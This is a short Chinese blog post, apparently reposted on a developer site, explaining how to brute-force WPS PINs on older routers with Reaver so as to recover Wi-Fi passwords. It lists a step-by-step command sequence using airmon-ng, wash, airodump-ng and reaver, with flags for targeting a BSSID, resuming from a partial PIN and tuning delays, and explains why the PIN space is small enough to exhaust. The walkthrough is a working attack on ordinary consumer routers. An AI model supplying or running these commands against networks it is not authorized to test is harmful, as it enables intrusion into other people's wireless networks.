Reaver无线破解工具——穷举PIN码破解简析

Reaver无线破解工具——穷举PIN码破解简析部分老版路由器有WPS或叫QSS功能,并且在默认开启状态时,可使用此工具。PIN码共为8位,按431分段,总共穷举有11000种组合。通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码。容易碰到的问题:连接超时,卡住,路由自保护等。reave的进度表文件保存在/usr/local/etc/reaver/MAC地址.wpc或/etc/reaver/MAC…

大家好,又见面了,我是你们的朋友全栈君。

部分老版路由器有WPS或叫QSS功能,并且在默认开启状态时,可使用此工具

PIN码共为8位,按4 3 1 分段,总共穷举有11000种组合。通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码。
容易碰到的问题:连接超时,卡住,路由自保护等。
reave的进度表文件保存在/usr/local/etc/reaver/MAC地址.wpc 或/etc/reaver/MAC地址.wpc

基本用法:
1、ifconfig                                  //查看网络配置信息,网卡的模式和名称:常见为wlan0
2、airmon-ng start wlan0          //开启监听模式,此时网卡名变为 wlan0mon
3、wash -i wlan0mon               //利用wash,查看开启WPS的无线路由器
4、airodump-ng wlan0mon      //查看周边AP信息
5、reaver -i wlan0mon -b <Bssid> -vv       //开始穷举PIN码

// -i:网卡名称;-b:Bssid即路由ID;-vv:显示更多的非严重警告
// -p:pin码;-S :使用最小的DH key,可提高破解速度;
//另外,也可以给命令增加2个参数,延长PIN穷举和反馈的响应时间避免路由当机。

-d 即delay每穷举一次的闲置时间预设为1秒;-t 即timeout每次穷举等待反馈的最长时间

6、[reaver -i wlan0mon -b <Bssid> -vv -p xxxx]  //从前4位PIN码开始
7、知道PIN码以后使用如下命令反算出wifi连接密码
reaver -i wlan0mon -b <Bssid> ‘s MAC -p PIN码

此方法受信号强度和WPS保护机置等影响,尝试过几次,均信号在-70左右,均连接超时。
参考链接:https://zhuanlan.zhihu.com/p/24803690

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/137877.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号